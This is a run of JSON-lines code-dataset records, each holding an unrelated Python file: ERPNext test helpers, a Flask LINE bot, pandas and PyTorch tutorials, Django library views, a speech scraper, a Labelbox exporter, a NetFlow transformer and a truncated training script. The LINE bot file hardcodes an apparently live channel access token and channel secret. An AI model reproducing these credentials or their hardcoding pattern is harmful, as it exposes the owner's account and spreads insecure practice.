1,\n\t\t\t\t\"planned_start_date\": args.planned_start_date or now_datetime(),\n\t\t\t},\n\t\t)\n\n\tif args.get(\"get_items_from\") == \"Sales Order\" and args.get(\"sales_order\"):\n\t\tso = args.get(\"sales_order\")\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so.name,\n\t\t\t\t\"sales_order_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"grand_total\": so.grand_total,\n\t\t\t},\n\t\t)\n\t\tpln.get_items()\n\n\tif not args.get(\"skip_getting_mr_items\"):\n\t\tmr_items = get_items_for_material_requests(pln.as_dict())\n\t\tfor d in mr_items:\n\t\t\tpln.append(\"mr_items\", d)\n\n\tif not args.do_not_save:\n\t\tpln.insert()\n\t\tif not args.do_not_submit:\n\t\t\tpln.submit()\n\n\treturn pln\n\n\ndef make_bom(**args):\n\targs = frappe._dict(args)\n\n\tbom = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"BOM\",\n\t\t\t\"is_default\": 1,\n\t\t\t\"item\": args.item,\n\t\t\t\"currency\": args.currency or \"USD\",\n\t\t\t\"quantity\": args.quantity or 1,\n\t\t\t\"company\": args.company or \"_Test Company\",\n\t\t\t\"routing\": args.routing,\n\t\t\t\"with_operations\": args.with_operations or 0,\n\t\t}\n\t)\n\n\tfor item in args.raw_materials:\n\t\titem_doc = frappe.get_doc(\"Item\", item)\n\n\t\tbom.append(\n\t\t\t\"items\",\n\t\t\t{\n\t\t\t\t\"item_code\": item,\n\t\t\t\t\"qty\": args.rm_qty or 1.0,\n\t\t\t\t\"uom\": item_doc.stock_uom,\n\t\t\t\t\"stock_uom\": item_doc.stock_uom,\n\t\t\t\t\"rate\": item_doc.valuation_rate or args.rate,\n\t\t\t\t\"source_warehouse\": args.source_warehouse,\n\t\t\t},\n\t\t)\n\n\tif not args.do_not_save:\n\t\tbom.insert(ignore_permissions=True)\n\n\t\tif not args.do_not_submit:\n\t\t\tbom.submit()\n\n\treturn bom\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/manufacturing/doctype/production_plan/test_production_plan.py","file_name":"test_production_plan.py","file_ext":"py","file_size_in_byte":25191,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"25399242747","text":"#載入LineBot所需要的套件\r\nfrom flask import Flask, request, abort\r\n\r\nfrom linebot import (\r\n LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n InvalidSignatureError\r\n)\r\nfrom linebot.models import *\r\n\r\napp = Flask(__name__)\r\n\r\n# 必須放上自己的Channel Access Token\r\nline_bot_api = LineBotApi('cVuxUh37rdpZfzeIxlzBacx+9nDM/eej2DOry4cVwJDGWF0tkWrQhTKgLnxS5iDzLNybhSrXf/d4iloPvHANce0/akvAUAad1h7BUcIKGHVigu4pvRIWgjD/BwfymT15PwjelfRpr+QJWTpXSkBOfgdB04t89/1O/w1cDnyilFU=')\r\n\r\n# 必須放上自己的Channel Secret\r\nhandler = WebhookHandler('460f3260ada98363f7b7959b227ec32f')\r\n\r\n\r\n# 監聽所有來自 /callback 的 Post Request\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n # get X-Line-Signature header value\r\n signature = request.headers['X-Line-Signature']\r\n\r\n \r\n # get request body as text\r\n body = request.get_data(as_text=True)\r\n app.logger.info(\"Request body: \" + body)\r\n\r\n # handle webhook body\r\n try:\r\n handler.handle(body, signature)\r\n except InvalidSignatureError:\r\n abort(400)\r\n\r\n return 'OK'\r\n\r\n \r\n#訊息傳遞區塊\r\n##### 基本上程式編輯都在這個function #####\r\n@handler.add(MessageEvent, message=ImageMessage)\r\ndef handle_message(event):\r\n from bttr.lit_bttr import LitBTTR\r\n from PIL import Image\r\n from torchvision.transforms import ToTensor\r\n \r\n # 請api用get_message_content依照訊息id將圖片要回\r\n message_content = line_bot_api.get_message_content(event.message.id)\r\n \r\n # 請api回覆已經上傳\r\n line_bot_api.reply_message(\r\n 
event.reply_token,\r\n        TextSendMessage(text='Image has Upload'+ ' ' + event.message.id + '\\n' + str(message_content)))\r\n\r\n#主程式\r\nimport os\r\nif __name__ == \"__main__\":\r\n    port = int(os.environ.get('PORT', 5000))\r\n    app.run(host='0.0.0.0', port=port)\r\n","repo_name":"jelishu0423/LineBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23277435491","text":"from hangman import Hangman\nfrom tictactoe import TicTacToe\n\ndef main():\n    while True:\n        game = input(\"Please select a game to play:\\n\"\n                     \"Type H to play Hangman\\n\"\n                     \"Type T to play Tic Tac Toe\\n\"\n                     \"Type Q to quit\\n\")\n        if game == \"H\":\n            new_game = Hangman(\"Hangman\", \"Will you escape the noose?\")\n            new_game.play_game()\n        elif game == \"T\":\n            new_game = TicTacToe(\"Tic Tac Toe\", \"Can you outsmart me?\")\n            new_game.play_game()\n        elif game == \"Q\":\n            print(\"Goodbye :'(\")\n            quit()\n        else:\n            print(\"Sorry, that was not a valid selection.\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"vhartvik/games","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13574285288","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\"\"\"\n    author:jjk\n    datetime:2020/02/05\n    coding:utf-8\n    project name:test/pandas\n    Program function: \n\n\"\"\"\nimport pandas as pd\nimport numpy as np\nget_ipython().run_line_magic('matplotlib', 'inline')\n# 1. map用于Series值的转换\n# 实例:将股票代码英文转换成中文名字\n# Series.map(dict) or Series.map(function)均可\nstocks = pd.read_excel('./datas/stocks/互联网公司股票.xlsx')\nstocks.head()\n\n\n# In[2]:\n\n\nstocks['公司'].unique()\n\n\n# In[5]:\n\n\n# 公司股票代码到中文的映射,注意这里是小写\ndict_company_names = {\n    'bidu':'百度',\n    'baba':'阿里巴巴',\n    'iq':'爱奇艺',\n    'jd':'京东'\n}\n\n\n# In[6]:\n\n\n# 方法1:Series.map(dict)\nstocks['公司中文'] = stocks['公司'].str.lower().map(dict_company_names)\nstocks.head()\n\n\n# In[8]:\n\n\n# 方法2:Series.map(function)\n# function的参数是Series的每个元组的值\nstocks['公司中文2'] = stocks['公司'].map(lambda x : dict_company_names[x.lower()])\nstocks.head()\n\n\n# In[9]:\n\n\n# 2、apply用于Series和DataFrame的转换\n# Series.apply(function),函数的参数为每个值\n# DataFrame.apply(function),函数的参数是Series\n\n\n# In[10]:\n\n\n# Series.apply(function),函数的参数为每个值\nstocks['公司中文3'] = stocks['公司'].apply(lambda x : dict_company_names[x.lower()])\nstocks.head()\n\n\n# In[14]:\n\n\n# DataFrame.apply(function),函数的参数是Series\n# stocks.apply的stocks是一个dataframe,\n# 扫描是跨列的\nstocks['公司名称4'] = stocks.apply(\n    lambda x : dict_company_names[x['公司'].lower()],\n    axis=1)\nstocks.head()\n\n\n# In[16]:\n\n\n# 注意这个代码:\n#1. apply是在stocks这个dataframe上调用\n#2. 
lambda x的x是一个series,因为指定了axis=1,所以series的key是列名,可以用x['公司']获取\n\n\n# In[18]:\n\n\n# 3、applymap用于dataframe所有值的转换\nsub_df = stocks[['收盘','开盘','高','低','交易量']]\nsub_df.head()\n\n\n# In[19]:\n\n\n# 将整个数字取整数,应用于所有元素\nsub_df.applymap(lambda x : int(x))\n\n\n# In[20]:\n\n\n# 直接修改原df的这几列\nstocks.loc[:,['收盘','开盘','高','低','交易量']] = sub_df.applymap(lambda x : int(x))\nstocks.head()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"jiajikang-nlp/pandas","sub_path":"15-pandas的数据转换函数.py","file_name":"15-pandas的数据转换函数.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29198806056","text":"from all.api.serializers import *\nfrom all.models import *\nfrom rest_framework import generics, parsers\nfrom django.db import connection\nfrom django.shortcuts import get_object_or_404\n\n\nclass LoanCreate(generics.CreateAPIView):\n queryset = Loan.objects.all()\n serializer_class = LoanSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve loan data from serializer\n loan_data = serializer.validated_data\n\n # Extract book name and member name from the loan data\n book_name = loan_data.get('book')\n member_name = loan_data.get('member')\n loan_date = loan_data.get('loan_date')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle loan creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL create_loan(%s, %s, %s, NULL)',\n [book_id, member_id, loan_date]\n )\n\n\nclass ReservationCreate(generics.CreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve reservation data from serializer\n reservation_data = serializer.validated_data\n\n # Extract book name and member name from the reservation data\n book_name = reservation_data.get('book')\n member_name = reservation_data.get('member')\n reservation_date = reservation_data.get('reservation_date')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle reservation creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL create_reservation(%s, %s, %s, NULL)',\n [book_id, member_id, reservation_date]\n )\n\n\nclass ReviewCreate(generics.CreateAPIView):\n queryset = Review.objects.all()\n serializer_class = ReviewSerializer\n parser_classes = [parsers.MultiPartParser, 
parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve review data from serializer\n review_data = serializer.validated_data\n\n # Extract book name and member name from the review data\n book_name = review_data.get('book')\n member_name = review_data.get('member')\n review_date = review_data.get('review_date')\n comment = review_data.get('comment')\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle review creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL add_review(%s, %s, %s, %s, NULL)',\n [book_id, member_id, comment, review_date]\n )\n\n\nclass FavoriteCreate(generics.CreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def perform_create(self, serializer):\n # Retrieve favorite data from serializer\n favorite_data = serializer.validated_data\n\n # Extract book name and member name from the favorite data\n book_name = favorite_data.get('book')\n member_name = favorite_data.get('member')\n\n # Get the book_id based on the provided book name\n try:\n book = Book.objects.get(title=book_name)\n book_id = book.book_id\n except Book.DoesNotExist:\n # Handle book not found error\n raise serializers.ValidationError(\"Book not found\")\n\n # Get the member_id based on the provided member name\n try:\n member = Member.objects.get(name=member_name)\n member_id = member.member_id\n except Member.DoesNotExist:\n # Handle member not found error\n raise serializers.ValidationError(\"Member not found\")\n\n # Call PostgreSQL stored procedure to handle favorite creation\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL add_to_favorites(%s, %s, NULL)',\n [book_id, member_id]\n )\n\n\nclass LoanReturn(generics.UpdateAPIView):\n queryset = Loan.objects.all()\n serializer_class = LoanForReturnSerializer\n parser_classes = [parsers.MultiPartParser, parsers.FormParser] # Include MultiPartParser\n\n def get_object(self):\n # Retrieve loan based on provided book title and member name\n book_title = self.request.data.get('book')\n member_name = self.request.data.get('member')\n try:\n book = Book.objects.get(book_id=book_title)\n member = Member.objects.get(member_id=member_name)\n loan = Loan.objects.get(book=book, member=member)\n return loan\n except (Book.DoesNotExist, Member.DoesNotExist, Loan.DoesNotExist):\n # Handle book, member, or loan not found error\n raise serializers.ValidationError(\"Book, member, or loan not found\")\n\n def perform_update(self, serializer):\n loan = self.get_object()\n\n # Call PostgreSQL stored procedure to handle loan return\n with connection.cursor() as cursor:\n cursor.execute(\n 'CALL handle_return(%s)',\n [loan.loan_id]\n )\n","repo_name":"tdhung-03/ie103_library","sub_path":"all/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"36914204696","text":"# Retrieve talks by speaker on speeches.byu.edu using BeautifulSoup\n\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport pandas as pd\nimport re\n\n'''Get list of urls for each of the topics For my reference, number of talks by speaker: Nelson - 22, Maxwell - 30, \nHolland - 27, Hinckley - 41, Monson - 14, Oaks - 35, Eyring - 25 (Total - 194)'''\nurl = \"https://speeches.byu.edu/speakers/\"\n\nurl_list = [\n 'russell-m-nelson/', 'neal-a-maxwell/', 'jeffrey-r-holland/', 'gordon-b-hinckley/', 'thomas-s-monson/',\n 'dallin-h-oaks', 'henry-b-eyring'\n]\n\nlinks = []\nnew_links = []\n\n''' some of the links are repeated with '?M=V' and '?M=A' and those will be removed so we can have a unique set of \nlinks to pull talk information from.'''\n\nfor u in url_list:\n response = requests.get(url + u)\n html = response.content\n video = '?M=V'\n soup = bs(html, 'lxml')\n for link in soup.findAll(\"a\", attrs={'href': re.compile(\"^https://speeches.byu.edu/talks/[\\D+]\")}):\n links.append(link.get('href').replace(video, ''))\n\n audio = '?M=A'\n for link in links:\n new_link = link.replace(audio, '')\n new_links.append(new_link)\n new_links = list(set(new_links))\n\nprint(len(new_links))\n\n'''Retrieves talk text from each of the urls using beautiful soup. Information such as the talk/sermon text, title, \ntopic, date, and speaker will be retrieved and put into a dataframe. A csv file will also be saved due to the time \nit takes to run or in case we need to work offline. '''\n\ntalk_text = []\nspeakers = []\n\nfor link in new_links:\n url = link\n response = requests.get(url)\n html = response.content\n soup = bs(html, 'lxml')\n temp_list = []\n\n link_splitter = link.split('/')\n speakers.append(link_splitter[4].replace('-', ' '))\n\n for div in soup.find_all('div', class_='single-speech__content'):\n talk_text.append(div.get_text(strip=True))\n\ndict_speeches_byu = {'speaker': speakers, 'talks': talk_text}\ndf = pd.DataFrame(dict_speeches_byu)\n\nprint(df.sample(15))\n\n# Now to pull information from the church general conference website.\n\n# Get list of urls for each of the topics\ngc_url = \"https://www.churchofjesuschrist.org/study/general-conference/speakers/\"\n\ngc_url_list = [\n 'russell-m-nelson/', 'neal-a-maxwell/', 'jeffrey-r-holland/', 'gordon-b-hinckley/', 'thomas-s-monson/',\n 'dallin-h-oaks', 'henry-b-eyring'\n]\n\nlinks = []\n\nfor u in gc_url_list:\n response = requests.get(gc_url + u)\n html = response.content\n soup = bs(html, 'lxml')\n for link in soup.findAll(\"a\", attrs={'href': re.compile(\"^/study/general-conference/\\w+/(?:\\w+/)(?:\\w+)\")}):\n links.append(link.get('href'))\n\ntalk_text = []\nspeakers = []\n\nfor link in links:\n url = 'https://www.churchofjesuschrist.org'+link\n response = requests.get(url)\n html = response.content\n soup = bs(html, 'lxml')\n\n sermon_name = soup.find_all('div', class_='byline')\n '''This is basically a switch statement that will allow for the speaker column to have the same format as the \n dataframe speeches.byu.edu dataframe created above.'''\n for x in sermon_name:\n if 'nelson' in x.find('p').text.lower():\n speakers.append('russell m nelson')\n elif 'maxwell' in x.find('p').text.lower():\n speakers.append('neal a maxwell')\n elif 'holland' in x.find('p').text.lower():\n speakers.append('jeffrey r holland')\n elif 'hinckley' in x.find('p').text.lower():\n speakers.append('gordon b hinckley')\n elif 'monson' in x.find('p').text.lower():\n speakers.append('thomas s monson')\n elif 'oaks' 
in x.find('p').text.lower():\n speakers.append('dallin h oaks')\n else:\n speakers.append('henry b eyring')\n\n for div in soup.find_all('div', class_='body-block'):\n talk_text.append(div.get_text(separator= ' ', strip=True))\n\ndict_gc = {'speaker': speakers,'talks': talk_text}\ndf_gc = pd.DataFrame(dict_gc)\n\nprint(df_gc.sample(15))\n\ndf = df.append(df_gc)\ndf.to_csv('talk_corpus.csv')\nprint(df.sample(50))","repo_name":"ramsey-king/DSC-680-Applied-Data-Science","sub_path":"Project-1/KingR_680_P1_dataset_collection.py","file_name":"KingR_680_P1_dataset_collection.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71545153192","text":"import random\nimport torch\nimport numpy as np\nimport pandas\nimport matplotlib.pyplot as p\nfrom torch.utils import data\nfrom torch import nn\n#from d2l import torch as d2l\n\ndef synthetic_data(w,b,num_example): # return X,y\n X = torch.normal(0,1,(num_example,len(w))) # X is a matrix with the size of num_example * len(w)\n y = torch.matmul(X,w) + b\n y += torch.normal(0,0.01,y.shape)\n return X,y.reshape((-1,1)) #让y成为列向量,不过在这个例子里面直接return也行,因为w为列向量\ntrue_w = torch.tensor([2,-3.4])\ntrue_b = 4.2\nfeatures,labels = synthetic_data(true_w,true_b,1000)\n\ndef load_array(data_arrays,batch_size,shuffle_in_train = True):\n dataset = data.TensorDataset(*data_arrays)\n return data.DataLoader(dataset,batch_size,shuffle_in_train)\n\nbatch_size = 10\ndata_iter = load_array((features,labels),batch_size)\n\nnet = nn.Sequential(nn.Linear(2,1))\nnet[0].weight.data.normal_(0,0.01)\nnet[0].bias.data.fill_(0)\n\n#loss = nn.MSELoss()\nloss = nn.HuberLoss()\n\ntrainer = torch.optim.SGD(net.parameters(),lr = 0.03)\n\nnum_epochs = 10\nfor epoch in range(num_epochs):\n for X,y in data_iter:\n l = loss(net(X),y)\n trainer.zero_grad()\n l.backward()\n trainer.step()\n l = loss(net(features),labels)\n print(f'epoch {epoch+1}, loss {l:f}')","repo_name":"SaltedFish23/Test","sub_path":"Dive_into_dl/linear_regression2.py","file_name":"linear_regression2.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22746526326","text":"import numpy as np\nfrom math import sqrt\nfrom collections import Counter\nfrom .metrics import accuracy_score\n\nclass KNN_Classify():\n\tdef __init__(self, k):\n\t\t\"\"\" 初始化KNN分类器 \n\t\t\"\"\"\n\t\tassert k >= 1, \"k must be valid\"\n\t\tself.k = k\n\t\tself._X_train = None\n\t\tself._y_train = None\n\t\n\tdef fit(self, X_train, y_train):\n\t\t\"\"\" 根据训练数据集X_train和y_train训练KNN分类器 \n\t\t\"\"\"\n\t\tassert X_train.shape[0] == y_train.shape[0], \\\n\t\t\"The size of X_train must be equal to the size of y_train\"\n\t\tassert self.k <= X_train.shape[0], \\\n\t\t\"The size of X_train must be at least k.\"\n\t\t\n\t\tself._X_train = X_train\n\t\tself._y_train = y_train\n\t\treturn self\n\t\n\tdef predict(self, X_predict):\n\t\t\"\"\" 给定待预测数据集X_predict,返回表示X_predict的结果向量 \n\t\t\"\"\"\n\t\tassert X_predict.ndim >= 2, (\"X_predict expected 2D array, got 1D array instead: array=%s.\\n\" %X_predict + \\\n\t\t\"Reshape your data either using array.reshape(-1, 1) if your data has a single feature or array.reshape(1, -1) if it contains a single sample\")\n\t\tassert self._X_train is not None and self._y_train is not None, \\\n\t\t\"must fit before predict !\"\n\t\tassert X_predict.shape[1] == self._X_train.shape[1], \\\n\t\t\"the feature of X_predict must be equal 
to X_train\"\n\t\t\n\t\ty_predict = np.array([self._predict(x) for x in X_predict])\n\t\treturn y_predict\n\t\n\tdef _predict(self, x):\n\t\t\"\"\" 给定单个待预测数据x(向量),返回x的预测结果 \n\t\t\"\"\"\n\t\tassert x.shape[0] == self._X_train.shape[1], \\\n\t\t\"the feature of x must be equal to X_train\"\n\t\t\n\t\t# 样例x与训练集中各元素的距离(欧拉距离)\n\t\tdistances = [sqrt(np.sum((x_train - x)**2)) for x_train in self._X_train] \n\t\n\t\t# 距离由小到大排列后元素对应的索引\n\t\tnearest = np.argsort(distances)\n\t\n\t\t# 前k个索引所属的类别\n\t\ttopK_y = [self._y_train[i] for i in nearest[:self.k]]\n\t\n\t\t# 汇总类别出现的次数\n\t\tvotes = Counter(topK_y)\n\t\n\t\t# 找出得票最多的那个\n\t\treturn votes.most_common(1)[0][0]\n\t\n\tdef score(self, X_test, y_test):\n\t\t''' 根据测试数据集 X_test 和 y_test 确定当前模型的准确度\n\t\t'''\n\t\ty_predict = self.predict(X_test)\n\t\treturn accuracy_score(y_test, y_predict)\n\n\tdef __repr__(self):\n\t\treturn \"KNN(k=%d)\" %self.k\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n","repo_name":"wang-orange/python-project","sub_path":"MachineLearning/playML/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18432185964","text":"\nimport json\nimport os\nimport requests\n\ndataset_name = \"Axillary_dataset_\"\ntrain_dir = \"train\"\nimages_dir = \"images\"\nmasks_dir = \"masks\"\nexport_path = \"C:\\\\Users\\\\Noam Suissa\\\\Downloads\"\n\ndef download_image(pic_url, path):\n    with open(path, 'wb') as handle:\n        response = requests.get(pic_url, stream=True)\n\n        if not response.ok:\n            print(response, path)\n\n        for block in response.iter_content(1024):\n            if not block:\n                break\n\n            handle.write(block)\n\n#create dirs\npath = os.path.join(export_path, dataset_name)\n\npath2 = os.path.join(path, train_dir)\n\npath3 = os.path.join(path2, images_dir)\n\npath4 = os.path.join(path2, masks_dir)\n\nif not os.path.exists(path):\n\tos.mkdir(path)\n\tos.mkdir(path2)\n\tos.mkdir(path3)\n\tos.mkdir(path4)\n\n#open labelbox json\nfp = open(\"C:\\\\Users\\\\Noam Suissa\\\\Downloads\\\\Axillary_train.json\")\n\njsn = json.load(fp)\n\n#populate dirs\nfor i in jsn:\n\t\n\tid_ = i[\"ID\"]\n\toriginal_img_url = i[\"Labeled Data\"]\n\tobjects = i[\"Label\"][\"objects\"]\n\n\t#download original image\n\tdownload_path = path3 + '/' +id_ + '.png'\n\tif not os.path.exists(download_path):\n\t\tdownload_image(original_img_url, download_path)\n\n\tim_path = os.path.join(path4, id_)\n\tif not os.path.exists(im_path):\n\t\tos.mkdir(im_path)\n\n\t#download masks\n\tfor o in objects:\n\t\tname = o[\"value\"]\n\t\tlink = o[\"instanceURI\"]\n\t\tob_path = os.path.join(im_path, name)\n\t\t\n\t\tif not os.path.exists(ob_path):\n\t\t\tos.mkdir(ob_path)\n\t\t\n\t\tobj_download_path = ob_path + '/' +id_ + '.png'\n\t\tif not os.path.exists(obj_download_path):\n\t\t\tdownload_image(link, obj_download_path)\n\n","repo_name":"noamsuissa/Labelbox-Image-Exporter","sub_path":"train_exporter.py","file_name":"train_exporter.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71812134633","text":"import json\nimport struct\nimport sys\nimport time\nimport logging\nimport geoip2.database\n\ndef transform_records():\n    while True:\n        byte_len = sys.stdin.buffer.read(8)\n        if len(byte_len) != 8:\n            assert len(byte_len) == 0, byte_len\n            return\n        (byte_len,) = struct.unpack(\"L\", byte_len)\n        result = sys.stdin.buffer.read(byte_len)\n        yield result\n\nfor records in 
transform_records():\n    flows = json.loads(records)\n    exported_time = time.strftime('%Y-%m-%d %H:%M:%S',\n                                  time.localtime(flows[\"Header\"][\"ExportTime\"]))\n    \n    try:\n        for flow in flows[\"DataSets\"]:\n            sourceIPAddress = \"unknown\"\n            destinationIPAddress = \"unknown\"\n            bgpSourceAsNumber = \"unknown\"\n            bgpDestinationAsNumber = \"unknown\"\n            protocolIdentifier = 0\n            sourceTransportPort = 0\n            destinationTransportPort = 0\n            tcpControlBits = \"unknown\"\n            ipNextHopIPAddress = \"unknown\"\n            octetDeltaCount = 0\n            ingressInterface = 0\n            egressInterface = 0\n            ASNumber = 0\n            CountryCode = \"\"\n            for field in flow:\n                if field[\"I\"] in [214]:\n                    # unsupported field; skip this record via the except below\n                    raise TypeError\n                elif field[\"I\"] in [8, 27]:\n                    sourceIPAddress = field[\"V\"]\n                elif field[\"I\"] in [12, 28]:\n                    destinationIPAddress = field[\"V\"]\n                elif field[\"I\"] in [15, 62]:\n                    ipNextHopIPAddress = field[\"V\"]\n                elif field[\"I\"] == 16:\n                    bgpSourceAsNumber = field[\"V\"]\n                elif field[\"I\"] == 17:\n                    bgpDestinationAsNumber = field[\"V\"]\n                elif field[\"I\"] == 14:\n                    ingressInterface = field[\"V\"]\n                elif field[\"I\"] == 10:\n                    egressInterface = field[\"V\"]\n                elif field[\"I\"] == 7:\n                    sourceTransportPort = field[\"V\"]\n                elif field[\"I\"] == 11:\n                    destinationTransportPort = field[\"V\"]\n                elif field[\"I\"] == 4:\n                    protocolIdentifier = field[\"V\"]\n                elif field[\"I\"] == 6:\n                    tcpControlBits = field[\"V\"]\n                elif field[\"I\"] == 1:\n                    octetDeltaCount = field[\"V\"]\n            # GeoIP enrichment for the source address\n            if sourceIPAddress != \"unknown\":\n                reader = geoip2.database.Reader('GeoLite2-City.mmdb')\n                CountryCode = reader.city(sourceIPAddress).country.iso_code\n                asnreader = geoip2.database.Reader('GeoLite2-ASN.mmdb')\n                ASNumber = asnreader.asn(sourceIPAddress).autonomous_system_number\n            out = \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" \\\n                % (\n                    flows[\"AgentID\"],\n                    sourceIPAddress,\n                    destinationIPAddress,\n                    ipNextHopIPAddress,\n                    bgpSourceAsNumber,\n                    bgpDestinationAsNumber,\n                    protocolIdentifier,\n                    sourceTransportPort,\n                    destinationTransportPort,\n                    tcpControlBits,\n                    ingressInterface,\n                    egressInterface,\n                    octetDeltaCount,\n                    exported_time,\n                    ASNumber,\n                    CountryCode,\n                )\n\n            sys.stdout.write(out)\n    except TypeError:\n        continue","repo_name":"CavidRzayev/transform","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73887654951","text":"print('train.py is running!')\r\n\r\nimport argparse\r\nimport seaborn as sb\r\nimport torch\r\nimport numpy as np\r\nfrom torch import nn\r\nfrom torch import optim\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms, models\r\nfrom PIL import Image\r\nfrom args_train import args\r\nhyper_params = { 'data_dir': args.data_dir,\r\n                 'save_dir': args.save_dir,\r\n                 'arch': args.arch,\r\n                 'epochs': args.epochs,\r\n                 'lr': args.lr,\r\n                 'gpu': args.gpu,\r\n                 'in_layers': args.in_layers,\r\n                 'hidden_layers': args.hidden_layers,\r\n                 'out_layers': args.out_layers,\r\n                 'drop': args.drop_rate,\r\n                 'topk':args.topk\r\n}\r\n\r\n\r\ntrain_dir = hyper_params['data_dir'] + '/train'\r\nvalid_dir = hyper_params['data_dir'] + '/valid'\r\ntest_dir = hyper_params['data_dir'] + '/test'\r\n\r\nnormalize_dict = {'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}\r\n\r\ndata_trans = {\r\n    'train': transforms.Compose([\r\n        transforms.RandomRotation(30),\r\n        transforms.RandomResizedCrop(224),\r\n        transforms.RandomHorizontalFlip(),\r\n        
transforms.ToTensor(),\r\n        transforms.Normalize(**normalize_dict)]),\r\n    'test': transforms.Compose([\r\n        transforms.Resize(256),\r\n        transforms.CenterCrop(224),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(**normalize_dict)]),\r\n    'valid': transforms.Compose([\r\n        transforms.Resize(256),\r\n        transforms.CenterCrop(224),\r\n        transforms.ToTensor(),\r\n        transforms.Normalize(**normalize_dict)])\r\n}\r\n\r\ndirs = {'train': train_dir,'test': test_dir,'valid': valid_dir}\r\n\r\nimages_datasets = {x: datasets.ImageFolder(dirs[x],transform = data_trans[x]) \r\n                   for x in list(data_trans.keys())}\r\n\r\ndata_load = {\r\n'train_load' : torch.utils.data.DataLoader(images_datasets['train'], batch_size=64, shuffle=True),\r\n'test_load' : torch.utils.data.DataLoader(images_datasets['test'], batch_size=64, shuffle=False),\r\n'valid_load' : torch.utils.data.DataLoader(images_datasets['valid'], batch_size=64, shuffle=True)\r\n}\r\n\r\nimages, labels = next(iter(data_load['test_load']))\r\nprint('test_load data: '+ str(len(images[0,2])))\r\n\r\n\r\ndef model_get(model_arch):\r\n    \r\n    if (model_arch == 'vgg16'):\r\n        model = models.vgg16(pretrained = True)\r\n    elif (model_arch == 'densenet121'):\r\n        model = models.densenet121(pretrained = True)\r\n    elif (model_arch == 'alexnet'):\r\n        model = models.alexnet(pretrained = True)\r\n\r\n    return model\r\n\r\n\r\ndef 